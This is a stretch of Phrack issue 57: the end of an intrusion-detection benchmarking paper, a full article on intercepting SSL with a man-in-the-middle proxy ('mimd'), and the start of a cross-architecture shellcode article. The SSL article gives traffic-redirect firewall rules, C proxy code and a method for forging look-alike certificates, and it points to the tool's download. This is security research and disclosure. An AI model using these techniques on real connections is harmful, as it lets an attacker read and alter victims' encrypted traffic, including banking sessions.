ASUS P3BF *Total of 30 gigabytes of HD capacity Transfer Rate of 15 Mb/s The Experiment will run for 22 days. Each IDS will run separately for 2 days. We'll use 3 Separate Subnets here 192.168.0.0/26 Netmask 255.255.255.192, 192.168.0.129/26 Netmask 255.255.255.192, And a Real IP Network, 200.200.200.x. The IDS can only differ on OS aspect and methods of detection, but must still mantain the same node configuration. We'll simulate, random network usage and 4 intrusion attacks (4 packets) until the amount of traffic reaches around 100,000 packets from diferent protocols. The gateway (host node) remains routing or seeing packets of the Internal network, Internet, WAN, etc. ------------------- | SWITCH | ------------------- | | |______DMZ ____>Firewall___>Router___> Internet | | | | |_________ | __________ LAN ____> _____________| | | | | ----- ----- HOST NODE | | ------- | | (login node) | | | |--- | | | | ---- | | | | | ----- ------- | ----- node |ooooo| _ node one |ooooo| | | two(IDS) (gateway) ------- - Keyboard/Mouse Monitor 4.1 -----|MPP Environment: Now we must define a network topology and a standard operating system for our prototype. The gateway host is in the three networks at the same time and it will handle the part of the software that will gather packet information, process a Depth-1st search and then transmit the supicious packets to the other hosts. The hardware will be: *3 Pentium II 400 MHZ *128 Megabytes RAM ---------------------- *1 Pentium III 550 MHZ *512 Megabytes RAM ---------------------- *Motherboard ASUS P3BF *Total of 30 gigabytes of HD capacity Transfer Rate of 15 Mb/s *1Megabyte of synchronous cache *100 Mb/s fast Ethernet Adapter ( Intel tulip based (2114X) ) The OS will be the Extreme Linux distribution CD which comes with all the necessary components to build a Cluster. Note that we have the same processing capability of the other NIDS systems (866 MHZ), we'll discuss the cost of all environments later. ------------------- | SWITCH | ------------------- __________| | | | | |______DMZ ____>Firewall___>Router___> Internet | ______| | | | | | | __| | | | __________ LAN ____> | | | | | | ----- ----- ----- | | ----- | | | | | | ----- |_____________| | ------- | | | | | | | | | | | |--- | | | | | | | | HOST NODE | | ---- | | | ----- ----- ----- | | (login node) ----- ------- | node node node ----- node |ooooo| _ five four three node one |ooooo| | | two (gateway) ------- - Keyboard/Mouse Monitor 5 ------|The Experiment: Tested NIDS Were: +SNORT +Computer Associates Intrusion Detection System +Real Secure +Shadow +Network Flight Recorder +Cisco NetRanger +EMERALD (Event Monitoring Enabling Response to Anomalous Live Disturbances) +Network Associates CyberCop +PENS Dragon Intrusion Detection System +Network ICE +MPP NIDS Prototype 5.1 ------|Results: ----|Snort False positives - 7 False Negatives - 3 True Positives - 1 1 P(Ii) = -------------------- = 2.5 * 10^-4 1*10^5 -------- 1*4 P(Ij) = 1 - P(Ii) = 0.99975 P(Ai|Ii) = 1/4 = 0.25 P(Ai|Ij) = 7/99996 = 7.0 * 10^-5 (2.5 * 10^-4) * (2.5^-10) BDR = ------------------------------------------------------------- = 0.4718 (2.5 * 10^-4) * (2.5^-10) + (9.9975 * 10^-1) * (7.0 * 10^-5) ----|Computer Associates Intrusion Detection System False positives - 5 False Negatives - 2 True Positives - 2 1 P(Ii) = -------------------- = 2.5 * 10^-4 1*10^5 -------- 1*4 P(Ij) = 1 - P(Ii) = 0.99975 P(Ai|Ii) = 2/4 = 0.50 P(Ai|Ij) = 5/99996 = 5.0 * 10^-5 (2.5 * 10^-4) * (5.0^-10) BDR = ------------------------------------------------------------- = 0.7143 (2.5 * 10^-4) * (5.0^-10) + (9.9975 * 10^-1) * (5.0 * 10^-5) ----|Real Secure False positives - 6 False Negatives - 2 True Positives - 2 1 P(Ii) = -------------------- = 2.5 * 10^-4 1*10^5 -------- 1*4 P(Ij) = 1 - P(Ii) = 0.99975 P(Ai|Ii) = 2/4 = 0.50 P(Ai|Ij) = 6/99996 = 6.0 * 10^-5 (2.5 * 10^-4) * (5.0^-10) BDR = ------------------------------------------------------------- = 0.6757 (2.5 * 10^-4) * (5.0^-10) + (9.9975 * 10^-1) * (6.0 * 10^-5) ----|Network Flight Recorder False positives - 5 False Negatives - 1 True Positives - 3 1 P(Ii) = -------------------- = 2.5 * 10^-4 1*10^5 -------- 1*4 P(Ij) = 1 - P(Ii) = 0.99975 P(Ai|Ii) = 3/4 = 0.75 P(Ai|Ij) = 5/99996 = 5.0 * 10^-5 (2.5 * 10^-4) * (7.5^-10) BDR = ------------------------------------------------------------- = 0.7895 (2.5 * 10^-4) * (7.5^-10) + (9.9975 * 10^-1) * (5.0 * 10^-5) ----|Cisco NetRanger False positives - 5 False Negatives - 3 True Positives - 1 1 P(Ii) = -------------------- = 2.5 * 10^-4 1*10^5 -------- 1*4 P(Ij) = 1 - P(Ii) = 0.99975 P(Ai|Ii) = 1/4 = 0.25 P(Ai|Ij) = 5/99996 = 5.0 * 10^-5 (2.5 * 10^-4) * (2.5^-10) BDR = ------------------------------------------------------------- = 0.5556 (2.5 * 10^-4) * (2.5^-10) + (9.9975 * 10^-1) * (5.0 * 10^-5) ----|EMERALD False positives - 7 False Negatives - 3 True Positives - 1 1 P(Ii) = -------------------- = 2.5 * 10^-4 1*10^5 -------- 1*4 P(Ij) = 1 - P(Ii) = 0.99975 P(Ai|Ii) = 1/4 = 0.25 P(Ai|Ij) = 7/99996 = 7.0 * 10^-5 (2.5 * 10^-4) * (2.5^-10) BDR = ------------------------------------------------------------ = 0.4718 (2.5 * 10^-4) * (2.5^-10) + (9.9975 * 10^-1) * (7.0 * 10^-5) ----|CyberCop False positives - 4 False Negatives - 2 True Positives - 2 1 P(Ii) = -------------------- = 2.5 * 10^-4 1*10^5 -------- 1*4 P(Ij) = 1 - P(Ii) = 0.99975 P(Ai|Ii) = 2/4 = 0.50 P(Ai|Ij) = 4/99996 = 4.0 * 10^-5 (2.5 * 10^-4) * (5.0^-10) BDR = ------------------------------------------------------------ = 0.7576 (2.5 * 10^-4) * (5.0^-10) + (9.9975 * 10^-1) * (4.0 * 10^-5) ----|PENS Dragon Intrusion Detection System False positives - 6 False Negatives - 2 True Positives - 2 1 P(Ii) = -------------------- = 2.5 * 10^-4 1*10^5 -------- 1*4 P(Ij) = 1 - P(Ii) = 0.99975 P(Ai|Ii) = 2/4 = 0.50 P(Ai|Ij) = 6/99996 = 6.0 * 10^-5 (2.5 * 10^-4) * (5.0^-10) BDR = ------------------------------------------------------------- = 0.6757 (2.5 * 10^-4) * (5.0^-10) + (9.9975 * 10^-1) * (6.0 * 10^-5) ----|Network ICE False positives - 5 False Negatives - 3 True Positives - 1 1 P(Ii) = -------------------- = 2.5 * 10^-4 1*10^5 -------- 1*4 P(Ij) = 1 - P(Ii) = 0.99975 P(Ai|Ii) = 1/4 = 0.25 P(Ai|Ij) = 5/99996 = 5.0 * 10^-5 (2.5 * 10^-4) * (2.5^-10) BDR = ------------------------------------------------------------- = 0.5556 (2.5 * 10^-4) * (2.5^-10) + (9.9975 * 10^-1) * (5.0 * 10^-5) ----|Shadow False positives - 3 False Negatives - 2 True Positives - 2 1 P(Ii) = -------------------- = 2.5 * 10^-4 1*10^5 -------- 1*4 P(Ij) = 1 - P(Ii) = 0.99975 P(Ai|Ii) = 2/4 = 0.50 P(Ai|Ij) = 3/99996 = 3.0 * 10^-5 (2.5 * 10^-4) * (5.0^-10) BDR = ------------------------------------------------------------- = 0.8065 (2.5 * 10^-4) * (5.0^-10) + (9.9975 * 10^-1) * (3.0 * 10^-5) ----|MPP NIDS Prototype False positives - 2 False Negatives - 1 True Positives - 3 1 P(Ii) = -------------------- = 2.5 * 10^-4 1*10^5 -------- 1*4 P(Ij) = 1 - P(Ii) = 0.99975 P(Ai|Ii) = 3/4 = 0.75 P(Ai|Ij) = 2/99996 = 2.0 * 10^-5 (2.5 * 10^-4) * (7.5^-10) BDR = ------------------------------------------------------------- = 0.9036 (2.5 * 10^-4) * (7.5^-10) + (9.9975 * 10^-1) * (2.0 * 10^-5) 4.2 -------|Normal Distribution Using the normal distribuiton method let us identify, for a scale from 1 to 10, what's the score of our NIDS Prototype: ---|The Average BDR for NIDS test was: 0.4718+0.7143+0.6757+0.7895+0.5556+0.4718+...+0.8065+0.9036 m(BDR) = ------------------------------------------------------------- 11 m(BDR) = 0.6707 ---|The Standard Deviation for NIDS test was: (0.4718 - 0.6707)^2+(0.7143 - 0.6707)^2+...+(0.9036 - 0.6707)^2 s(BDR)^2 = ---------------------------------------------------------------- 11 s(BDR) = 0.1420 ---|The Score The mean is 67.07(m) and the standard deviation is 14.2(s). Since 90.36(X) is 23.29 points above the mean (X - m = 23.29) and since a standard deviation is 14.2 points,there is a distance of 1.640(z) standard deviations between the 67.07 and 90.36 (z=[23.29/14.2]) plus 0,005 for rounds and 5.0 for our average standard score. The score (z) can be computed using the following formula: X - m Z = -------- s If you get a positive number for Z then apply (z = z + 0.005 + 5.0) If you get a negative number for Z then apply (z = z - 0.005 + 5.0) You should consider just the two first decimal places: So for our prototype we'll get: z = 1.640 + 0.005 + 5.0 z = 6.64 Our prototype scored 6.64 in our test, at this point the reader is encouraged to make the same calculation for all NIDS, you'll see that our prototype achieved the best score of all NIDS we tested. 6 -------|Why? Why our prototype differs so much from the rest of the NIDS, if it was built under almost the same concepts? 6.1 ---|E,A,D,R AND "C" Boxes Using the CIDF (Common Intrusion Detection Framework) we have 4 basic boxes, which are: E - Boxes, or event generators, are the sensors; Their Job is to detect events and push out the reports. A - Boxes receive reports and do analysis. They might offer a prescription and recommend a course of action. D - Boxes are database components; They can determine wheter an IP address or an attack has been seen before, and they can do trend analysis R - Boxes can take the input of the E, A and D Boxes and Respond to the event Now what are the "C" - Boxes? They are Redundancy Check boxes, they use CRC methods to check if a True Positive is really a True Positive or not. The C-Boxes can tell If an E - Box generates a rightful report or an A - Box generates a real true positive based on that report. Because we're dealing with a MPP Enviroment this node can be at all machines dividing the payload data by as much as boxes you have. 6.2 ---|CISL Our prototype Boxes use a language called CISL (Common Intrusion Specification Language) to talk with one another and it convey the following kinds of information: +Raw event information: Audit Trail Records and Network Traffic +Analysis Results: Description of System Anomalies and Detected Attacks +Response Prescriptions: Halt Particular Activities or modify component security specifications 6.3 ---|Transparent NIDS Boxes All but some E-Boxes will use a method comonly applied to firewalls and proxies to control in/out network traffic to certain machines. It's Called "Box Transparency", it reduces the needs for software replacement and user retain. It can control who or what is able to see the machine so all unecessary network traffic will be reduced by a minimum. 6.4 ---|Payload Distribution And E-Box to A-Box Tunneling Under MPI (Message Passing Interface) programming environment, using Beowulf as Cluster Plataform, we can distribute network payload traffic parsing of A - Boxes every machine in the cluster, maximizing the A - Box perfomance and C - Box as well. All other network traffic than the report data that come from E-Boxes by a encrypted tunneling protocol, is blocked in order to maximize the cluster data transfer and the DSM (Distributed Shared Memory). 7 -------|Conclusions Altough Neither Attack Method nor the NIDS Detection Model were considered on this paper, it's necessary to add that no one stays with a NIDS with their default configuration, so you can achieve best scores with your well configured system. You can also score any NIDS scope with this method and it gives you a glimpse of how your system is doing in comparison with others. Like it was said at the introduction topic, this paper is not a final solution for NIDS performance mesurement or a real panacea to false positive rates (doubtfully any paper will be), but it gives the reader a relative easy way to measure yours NIDS enviroment effectivess and it proposes one more way to perform this hard job. 8 -------|Bibliography AMOROSO, Edward G. (1999), "Intrusion Detection", Intrusion NetBook, USA. AXELSON, Stefan (1999) - "The Base-Rate Fallacy and its Implications for the Difficulty of Intrusion Detection", www.ce.chalmers.se/staff/sax/difficulty.ps, Sweden. BUNDY, Alan (1997), "Artificial Inteligence Techniques", Springer-Verlag Berlin Heidelberg, Germany. BUYYA, Rajkumar (1999), "High Performance Cluster Computing: Architectures and Systems", Prentice Hall, USA. KAEO, Merike (1999), "Designing Network Security", Macmillan Technical Publishing, USA. LEORNARD, Thomas (1999), "Bayesian Methods: An Analysis for Statisticians and Interdisciplinary Researchers", Cambridge Univ Press, UK. NORTHCUTT, Stephen (1999), "Network Intrusion Detection: An Analyst's Handbook", New Riders Publishing, USA. PATEL, Jagdish K. (1996), "Handbook of the Normal Distribution", Marcel Dekker, USA. STERLING, Thomas L. (1999), "How to Build a Beowulf: A Guide to the Implementation and Application of PC Clusters", MIT Press, USA. 9 -------|Acknowlegments: #Segfault at IRCSNET, Thanks for all fun and moral support TICK, for the great hints on NIDS field and beign the first one to believe on this paper potential VAX, great pal, for all those sleepless nights Very Special Thanks to GAMMA, for the great Text & Math hints SYD, for moral support and great jokes All THC crew Michal Zalewski, dziekuje tobie za ostatnia noc My Girlfriend Carolina, you all Know why :) Storm Security Staff, for building the experimental environment |=[ EOF ]=---------------------------------------------------------------=| ==Phrack Inc.== Volume 0x0b, Issue 0x39, Phile #0x0d of 0x12 |=---=[ Haaaang on snoopy, snoopy hang on. (SSL for fun and profit) ]=---=| |=-----------------------------------------------------------------------=| |=------------------=[ Stealth ]=-----------------=| Introduction ------------ SSL in version 3 known as SSLv3 or current version 3.1 also known as TLS provides a mechanism to securely transfer data over a network with recognition of modified or re-played packets. It has all requirements a secure system needs for, lets say, managing your bankaccounts. I'll show that in practise this is not true. In that article I will guide you through the parts of SSL which are important for us and necessary to know. Things we do not play with such as the SSL handshake are not explained in depth; take a look to the references if you are interested. 1. Why SSL ---------- SSL was designed to provide: 1.) Confidentiality This is reached by encrypting the data that is passed over the network with a symetric algorithm choosen during SSL handshake. SSL uses variable amount of ciphers, assumed to be non-breakable. If a new attack shows up against a specific algorithm, this does not hurt SSL much, it just chooses a different one. 2.) Message Integrity SSL is using a strong Message Authentication Code (MAC) such as SHA-1 which is appended to the end of the packet that contains the data and encrypted along with the payload. That way SSL detects when the payload is tampered with, since the computed hashes will not match. The MAC is also used to protect the handshake from tampering. 2.1.) Protection against replay-attacks SSL is using seqence-numbers to protect the communicating parties from attackers who are recording and replaying packets. The sequence-number is encrypted as the payload is. During handshake a 'random' is used to make the handshake unique and replay attacks impossible. 2.2.) Protection against reorder-attacks As in 2.1.) the seqence-numbers also forbid to record packets and send them in a different order. 3.) Endpoint Authentication With X509 (currently version 3) certificates SSL supports authentication of clients and servers. Authentication of servers is what you want when using https with your bank, but this is where we take a deeper look. This sounds pretty secure. However using the program that is explained until the end of this article, neither of the points is true any longer (except we cannot break client-authentication). At the end we are able to watch at the plain data, modifying it at our needs, recording it, sending it delayed, in wrong order or duplicated. This will basicly be done via a man in the middle attack where several weaknesses in interactive SSL-clients are exploited, "give it to the user" in particular. 2. X509 certificates -------------------- X509 certificates are integral part of SSL. The server sends his cert to the client during SSL handshake. A X509 cert contains the distinguished name (DN) of the issuer the DN of the subject, a version and serialnumber, algorithms choosen, a timeframe where the key is valid and ofcorse the public key of the subject. The subject is the (distinguished) name of the entity that the public key in this cert belongs to. Unfortunally in plain X509 certs there is no field that is labeled "DNS-name" so that you can match it against the URL you are viewing for instance. Usually the CN field is what is mapped to the DNS name but this is just a convention which both (client and entity offering its cert) must be aware of. "Issuer" is the (distinguished) name of the entity that signed this cert with its private key. It is called a Certificate Authority -- CA. Lets view a X509 cert: stealth@lydia:sslmim> ./cf segfault.net 443|openssl x509 -text Certificate: Data: Version: 1 (0x0) Serial Number: 1 (0x1) Signature Algorithm: md5WithRSAEncryption Issuer: C=EU, ST=segfault, L=segfault, O=www.segfault.net/Email=crew@segfault.net Validity Not Before: Nov 19 01:57:27 2000 GMT Not After : Apr 5 01:57:27 2028 GMT Subject: C=EU, ST=segfault, L=segfault, O=www.segfault.net, CN=www.segfault.net/Email=crew@segfault.net Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public Key: (1024 bit) Modulus (1024 bit): 00:cd:64:2a:97:26:7a:9b:5c:52:5e:9c:9e:b3:a2: e5:f5:0f:99:08:57:1b:68:3c:dd:22:36:c9:01:05: e1:e5:a4:40:5e:91:35:8e:da:8f:69:a5:62:cf:cd: 70:dc:ca:d2:d7:92:03:5c:39:2a:6d:02:68:91:b9: 0d:d1:2c:c7:88:cb:ad:be:cc:e2:fa:03:55:a1:25: 47:15:35:8c:d9:78:ef:9f:6a:f6:5f:e6:9a:02:12: a3:c2:b8:6a:32:0f:1d:9d:7b:2f:65:90:4e:ca:f7: a0:e4:ae:55:91:09:e4:6e:01:e3:d1:71:1e:60:b1: 83:88:8f:c4:6a:8c:bb:26:fd Exponent: 65537 (0x10001) Signature Algorithm: md5WithRSAEncryption 7d:c7:43:c3:71:02:c8:2f:8c:76:9c:f3:45:4c:cf:6d:21:5d: e3:8f:af:8f:e0:2e:3a:c8:53:36:6b:cf:f6:27:01:f0:ed:ee: 42:78:20:3d:7f:e3:55:1f:8e:f2:a0:8e:1a:1b:e0:76:ad:3e: a0:fc:5b:ce:a6:c4:32:7b:64:f2:a4:0f:a3:be:a1:0e:a7:ca: ed:67:39:07:65:6b:cc:e7:5a:9a:b0:3a:f3:5c:1a:18:d4:dd: 8c:8d:5a:9e:a0:63:e0:7d:af:7c:97:7c:89:17:0f:25:2f:a7: 80:d3:02:dc:88:7a:12:64:ec:8a:ff:e4:62:92:2e:7f:75:03: 82:f1 Important line is Issuer: C=EU, ST=segfault, L=segfault, O=www.segfault.net/Email=crew@segfault.net Where C, ST, L, O and Email (so called relative DNs -- RDN) build the issuer DN. Same for the subject: Subject: C=EU, ST=segfault, L=segfault, O=www.segfault.net, CN=www.segfault.net/Email=crew@segfault.net Certs may be be signed by a public known CA where the subject has no control over the private key used for that purpose, or by the subject itself -- so called self-signed cert. In this example, the cert is signed by a own CA. By the way, this is the original segfault.net certificate, noone was intercepting communication while fetching it. We will later see how it looks like when someone is playing with the connection. This certificate is exchanged during SSL handshake when you point netscape browser to https://segfault.net. The public key contained in this cert is then used for session encryption. To have a pretty good level of security, certs should be signed by a (either your own, as in this example, or a public) CA where the client has the public key handy to check this cert. If the client does not have the public key from the CA to check the integrity of the cert, it prompts the user to accept/deny it. This "requirement" for interactive clients and the fact that there are so many "well-surfed" sites which provide certs where nobody has the key for proper checking by default will in last consequence make SSL obsolete for common interactive SSL clients, i.e. Netscape browser. 3. Getting in between --------------------- As seen, X509-certificates are an important part of SSL. Its task is to prove to the client that he is talking to the server he is expecting, and that he is using the apropriate key while doing so. Now, imagine what could be done when we could fake such a certificate, and transparently forward a SSL connection. Got it? Its worth a try. Our leading motto 'teile und herrsche' shows that there are two problems which we must solve. a) Hijacking the connection to be able to transparently forward it. b) Faking certificates to the client, so that he always sees the certs he is expecting and taking us for the real server. a+b are usually called a 'man in the middle' attack. X509 certs should make this impossible but common cert-checking implementations such as Netscape browser (and in general, interactive clients) hardly get it. First problem is pretty easy to solve. Given that we sit physically between the two parties, we just use our firewall skills (preferably on Linux or BSD :) to redirect, lets say https-traffic to our program called 'mimd'. This would probably look like # ipchains -A input -s 0/0 -d 0/0 443 -j REDIRECT 10000 -p tcp or similar to grab the https-traffic on the input chain. For local mimd action on a 2.4 kernel box you'd type # iptables -t nat -A OUTPUT -p tcp --sport 1000:3000 --dport 443\ -j REDIRECT --to-port 10000 Given the (expected) source-ports from the SSL-client. If we ommit that, mimd will enter an infinite loop (iptables would redirect already redirected traffic). Since mimd binds to port 8888 and up it does not match the rule. You do not need to sit physically between the parties, it is usually enough to be in the LAN of the server or the LAN of the client. ARP-tricks do the job pretty well then, the FW-rules will not even change. With these redirect-rules we could already set up a simple bouncer with a tiny select() loop. The target-address can be found using the operating system API (usually via getsockopt() or alike, I compiled NS_Socket::dstaddr() function for the most important OSes :) Using our little bouncer, we can not see what is passed on the link, since we do not involve SSL itself. To be able to see plain traffic, we should modify our (virtual) little bouncer with a SSL_accpet() and a SSL_connect() statement. After accpet()ing the connection we would connect() to the real target and issue a call to SSL_connect(). Done that, we invoke SSL_accept(). Assuming we had done the initialization stuff before such as loading the key-file etc. the SSL-client will now prompt the bouncer-cert to the user. Obviously for him that this is faked, because when he surfes company-A and gets cert for company-B or 'MiM' he is probably a little bit confused. We will solve that problem. Our calls to SSL_connect() and SSL_accept() are already in the right order, and I will now explain why. 4. DCA ------ We can already see the plain text of the connection via SSL_read() and forward it to the target via SSL_write() if the user on the SSL-client just accepts the certificate. It is now time to solve the second part-problem: faking the certificate. Remember, we first issued SSL_connect(), before we do the SSL_accept(), so the server sees us as a legitimate client when doing SSL_connect() and does the SSL handshake. As a result we have the server certificate. Lets see what we have so far: ... // block for incoming connections while ((afd = accept(sfd, (sockaddr*)&from, &socksize)) >= 0) { // Get real destination // of connection if (NS_Socket::dstaddr(afd, &dst) < 0) { log(NS_Socket::why()); die(NULL); } ... ++i; if (fork() == 0) { // --- client-side if ((sfd2 = socket(PF_INET, SOCK_STREAM, 0)) < 0) { log("main::socket"); die(NULL); } if (NS_Socket::bind_local(sfd2, 8888+i, 0) < 0) { log(NS_Socket::why()); die(NULL); } // fire up connection to real server if (connect(sfd2, (struct sockaddr*)&dst, sizeof(dst)) < 0) { log("main::connect"); die(NULL); } ... client->start(); client->fileno(sfd2); // this socket to use // do SSL handshake if (client->connect() < 0) { log("Clientside handshake failed. Aborting."); die(NULL); } The handshake with the real server is finished right *now*. Take this as some sort of SSL-pseudocode, the use of SSL_connect() and SSL_accept() is encapsulated into client and server objects respectively. Now we can prepare ourself to be a server for the SSL-client: // --- server-side server->start(); // create SSL object server->fileno(afd); // set socket to use Not calling SSL_accept() until we actually do the fake: if (enable_dca) NS_DCA::do_dca(client, server); Dynamic Certificate Assembly (DCA) does the following: Given an almost empty certificate (all RDN are non-existant except C -- Country) the do_dca() fills this X509 cert with the contents of the X509 certificate obtained during SSL-handshake with the server before. We rip the L, ST, O, CN, the OU and the Email field (as present) and place it into our certificate which we will show to the SSL-client. This is done using some ugly string-parsing, and using X509_() functions offered by OpenSSL. For the OU field in the issuer we append a space " " which will not show up in the window of the SSL-client but makes it differ from the saved certs from public CA's. The user will be prompted to accept a cert from a "well known CA" (because user sees the name, but not the appended space, SSL-client can not find apropriate public key for this CA and prompts), which he will probably accept. Nice eh? As a special gift, we can use the subject fields (CN,...) for the issuer-fields so the former public CA signed X509-cert becomes self-signed! Since self-signed certificates are usually shown to the user he cant know it is a fake! Assembled the cert, lets just show it to the client: // do SSL handshake as fake-server if (server->accept() < 0) { log("Serverside handshake failed. Aborting."); die(NULL); } ssl_forward(client, server); Done. ssl_forward() just calls SSL_read/SSL_write in a loop and records the plain data. We could also modify the stream, replaying or supressing it -- as we wish. Lets fetch a X509-cert from a https-server via cf when mimd is active: [starting mimd somewhere, maybe on localhost] stealth@lydia:sslmim> ./cf segfault.net 443|openssl x509 -text Certificate: Data: Version: 3 (0x2) Serial Number: 1 (0x1) Signature Algorithm: md5WithRSAEncryption Issuer: C=US, C=EU, ST=segfault, L=segfault, O=www.segfault.net, OU= /Email=crew@segfault.net Validity Not Before: Mar 20 13:42:12 2001 GMT Not After : Mar 20 13:42:12 2002 GMT Subject: C=US, C=EU, ST=segfault, L=segfault, O=www.segfault.net, CN=www.segfault.net/Email=crew@segfault.net Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public Key: (1024 bit) Modulus (1024 bit): 00:d4:4f:57:29:2c:a0:5d:2d:af:ea:09:d6:75:a3: e5:b6:db:41:d7:7f:b7:da:52:af:d1:a7:b8:bb:51: 94:75:8d:d4:c4:88:3f:bf:94:b1:a9:9a:f8:55:aa: 0d:11:d6:8f:8c:8b:5b:b5:db:03:18:7e:7a:d7:3b: b0:24:a9:d6:ba:9a:a7:bb:9b:ba:78:50:65:4b:21: 94:6f:83:d4:de:16:e4:8b:03:f2:97:f0:0b:9b:55: ed:aa:d2:c3:ee:66:55:10:ba:59:4d:f0:9d:4e:d4: b5:52:ff:8c:d9:75:c2:ae:49:be:63:57:b9:48:36: ca:c2:07:9d:ba:32:ff:d6:e7 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Subject Key Identifier: 4A:2C:50:3A:50:4E:96:3D:E6:C7:4E:E8:C2:DF:41:F0:0A:26:F0:DD X509v3 Authority Key Identifier: keyid:4A:2C:50:3A:50:4E:96:3D:E6:C7:4E:E8:C2:DF:41:F0:0A:26:F0:DD DirName:/C=US serial:00 X509v3 Basic Constraints: CA:TRUE Signature Algorithm: md5WithRSAEncryption b7:7d:5a:c7:73:19:66:aa:89:25:7c:f6:bc:fd:7d:82:1a:d0: ac:76:93:72:db:2d:f6:3b:e0:88:5f:1d:6e:7c:25:d7:a2:de: 86:28:38:90:cf:fe:38:a0:1f:67:87:37:8b:2c:f8:65:57:de: d1:4c:67:55:af:ca:4c:ae:7b:13:f2:6f:b6:64:f6:aa:7f:28: 8b:2f:21:07:8f:6d:7e:0c:3f:17:b1:69:3a:ea:c0:fb:a2:aa: f9:d6:a6:05:6d:77:e1:e6:f0:12:a3:e6:ca:2a:73:33:f2:91: e1:72:c8:83:84:48:fa:fe:98:6c:d4:5a:ab:98:b2:2e:3c:8a: eb:f2 As you can see, the public key differs to the one before (without mimd) because it is the mimd key itself. The C field contains "US" and "EU" where only the latter is shown in Netscape, so no difference. Aware of the " " in the OU field? Since the original cert did not contain a OU field, it now is just a " ". Does not matter. The issuer has been taken from original issuer-field in X509 cert. Now, lets try to take the subject-field for the issuer. Somewhat obsolete for this example because it is not signed by a public CA, but in case an important public CA signed the cert, a self-signed fake might be a nice toy: [restarting mimd, this time in the 'use-subject' way] stealth@lydia:sslmim> ./cf segfault.net 443|openssl x509 -text Certificate: Data: Version: 3 (0x2) Serial Number: 1 (0x1) Signature Algorithm: md5WithRSAEncryption Issuer: C=US, C=EU, ST=segfault, L=segfault, O=www.segfault.net, OU= , CN=www.segfault.net/Email=crew@segfault.net Validity Not Before: Mar 20 13:42:12 2001 GMT Not After : Mar 20 13:42:12 2002 GMT Subject: C=US, C=EU, ST=segfault, L=segfault, O=www.segfault.net, CN=www.segfault.net/Email=crew@segfault.net Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public Key: (1024 bit) Modulus (1024 bit): 00:d4:4f:57:29:2c:a0:5d:2d:af:ea:09:d6:75:a3: e5:b6:db:41:d7:7f:b7:da:52:af:d1:a7:b8:bb:51: 94:75:8d:d4:c4:88:3f:bf:94:b1:a9:9a:f8:55:aa: 0d:11:d6:8f:8c:8b:5b:b5:db:03:18:7e:7a:d7:3b: b0:24:a9:d6:ba:9a:a7:bb:9b:ba:78:50:65:4b:21: 94:6f:83:d4:de:16:e4:8b:03:f2:97:f0:0b:9b:55: ed:aa:d2:c3:ee:66:55:10:ba:59:4d:f0:9d:4e:d4: b5:52:ff:8c:d9:75:c2:ae:49:be:63:57:b9:48:36: ca:c2:07:9d:ba:32:ff:d6:e7 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Subject Key Identifier: 4A:2C:50:3A:50:4E:96:3D:E6:C7:4E:E8:C2:DF:41:F0:0A:26:F0:DD X509v3 Authority Key Identifier: keyid:4A:2C:50:3A:50:4E:96:3D:E6:C7:4E:E8:C2:DF:41:F0:0A:26:F0:DD DirName:/C=US serial:00 X509v3 Basic Constraints: CA:TRUE Signature Algorithm: md5WithRSAEncryption b7:7d:5a:c7:73:19:66:aa:89:25:7c:f6:bc:fd:7d:82:1a:d0: ac:76:93:72:db:2d:f6:3b:e0:88:5f:1d:6e:7c:25:d7:a2:de: 86:28:38:90:cf:fe:38:a0:1f:67:87:37:8b:2c:f8:65:57:de: d1:4c:67:55:af:ca:4c:ae:7b:13:f2:6f:b6:64:f6:aa:7f:28: 8b:2f:21:07:8f:6d:7e:0c:3f:17:b1:69:3a:ea:c0:fb:a2:aa: f9:d6:a6:05:6d:77:e1:e6:f0:12:a3:e6:ca:2a:73:33:f2:91: e1:72:c8:83:84:48:fa:fe:98:6c:d4:5a:ab:98:b2:2e:3c:8a: eb:f2 The only diff between these two is that a CN shows up in the issuer-field now which has not been there before. It would have more effect with public CA's as I already mentioned. 5. Conclusion ------------- To conclude: a user surfing the web with interactive client as they exist by now CAN NOT KNOW that his connection is subject to a mim attack. There is no way for him to distinguish between 'browser prompts because company uses unknown CA' or 'the unknown CA is mimd'. Even when he already surfed the site and saved the cert (!) he can fall into this trap. An attentive user MIGHT notice that he is prompted to accept a 'RSA Data Security' or a 'Verisign' signed cert and wonders. Enabling self-signing switch in mimd will kill his doubts. In this article I focused on the 'separate-ports' way to break SSL, there is also a thing called 'upward negotiation' which turns a former plain-text stream into a SSL stream via a keyword (STARTTLS for example). All things said about SSL apply to it as well, just you can not use mimd in this case, because you need to filter SSL connections and forward it to mimd. This will probably be done using MSG_PEEK; we are researching. :) Thanks to Segfault Consortium for providing a testing environment and various folks for proof-reading the article. Blame them if something is wrong. :) References: ----------- [1] "SSL and TLS" Designing and Building Secure Systems Eric Rescorla, AW 2001 A 'must-read' if you want/need to know how SSL works. [2] "Angewandte Kryptographie" Bruce Schneier, AW 1996 THE book for crypto-geeks. I read the german version, in english its 'Applied Cryptographie' [2] various openssl c-files and manpages [3] http://www.cs.uni-potsdam.de/homepages/students/linuxer/sslmim.tar.gz A DCA implementation, described in this article; also contains 'cf' tool. [4] In case you cannot try mimd on your local box, view a snapshot from a mim-ed session provided by TESO: http://www.team-teso.net/ssl-security.png |=[ EOF ]=---------------------------------------------------------------=| ==Phrack Inc.== Volume 0x0b, Issue 0x39, Phile #0x0e of 0x12 |=---------------=[ Architecture Spanning Shellcode ]=-------------------=| |=-----------------------------------------------------------------------=| |=--------------------=[ eugene@gravitino.net ]=-------------------------=| Introduction ------------ At defcon8 caezar's challenge 4 party [1] a problem was present to write a shellcode that would run on two or more processor platforms. Below you will find my solution (don't forget to check the credits section). The general idea behind an architecture spanning shellcode is trying to come up with a sequence of bytes that would execute a jump instruction on one architecture while executing a nop-like instruction on another architecture. That way we can branch to architecture specific code depending on the platform our code is running on. Here is an ASCII representation of our byte stream: XXX arch1 shellcode arch2 shellcode where XXX is a sequence of bytes that is going to branch to arch2's shellcode on architecture 2 and is going to fall through to arch1 shellcode on architecture 1. If we want to add more platforms we would need to add additional jump/nop instructions for each additional platform. MIPS architecture ------------------ A brief introduction to the MIPS architecture and writing MIPS shellcode was described by scut in phrack 56 [2] as well as by the LSD folks in their paper [8]. The only thing that is worse repeating here is the general MIPS instruction format. All MIPS instructions occupy 32 bits and the sixth most 